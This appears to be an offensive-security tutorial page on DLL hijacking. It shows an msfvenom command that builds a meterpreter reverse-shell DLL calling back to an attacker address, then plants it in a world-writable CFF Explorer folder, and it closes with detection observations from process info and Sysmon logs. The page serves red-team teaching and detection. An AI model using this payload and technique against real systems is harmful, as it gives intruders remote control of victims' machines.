> For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.ired.team/offensive-security/privilege-escalation/t1038-dll-hijacking.md).

# DLL Hijacking

## Execution

Generating a DLL that will be loaded and executed by a vulnerable program which connect back to the attacking system with a meterpreter shell:

{% code title="attacker\@kali" %}

```csharp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > evil-meterpreter64.dll
```

{% endcode %}

To illustrate this attack, we will exploit our beloved tool `CFF Explorer.exe` . Once the program is executed, it attempts to load `CFF ExplorerENU.dll` from the location the program is installed to, however that DLL cannot be loaded (note the NAME NOT FOUND) as it does not exist in the given path:

![](/files/-LIRknY3zb0_MxOLj0NX)

Luckily for the attacker, the location in which the DLL is being looked for - is world writable! Let's move our evil DLL `evil-meterpreter64.dll` to `C:\Program Files\NTCore\Explorer Suite` and rename it to `CFF ExplorerENU.dll`&#x20;

![](/files/-LIRmJl9V1yeo6QOGAr-)

Launching the program again gives different results - DLL is found (SUCCESS):

![](/files/-LIRmfQYhm8047M_0XQh)

which is good news for the attacker - the DLL code gets executed, which gives attacker a meterpreter shell:

![](/files/-LIRmrmNBNKw7BSTVo_K)

## Observations

On the victim system, we can only see rundll32 with no associated parent process and established connection - this should raise your suspicion immediately:

![](/files/-LIRn5zzPhyA14bHGTe0)

Looking at the rundll32 image info, we can see the current directory, which is helpful:

![](/files/-LIRnVNGX3_GHnHxOxkS)

Looking at the sysmon logs gives us a better understanding of what happened - CFF Explorer.exe was started as a process `4856` which then kicked off a rundll32 (`1872`) which then established a connection to 10.0.0.5:

![](/files/-LIRpIVuFbSrV3YO9f0h)

## References

{% embed url="<https://attack.mitre.org/wiki/Technique/T1038>" %}

{% embed url="<https://pentestlab.blog/2017/03/27/dll-hijacking/>" %}

<br>
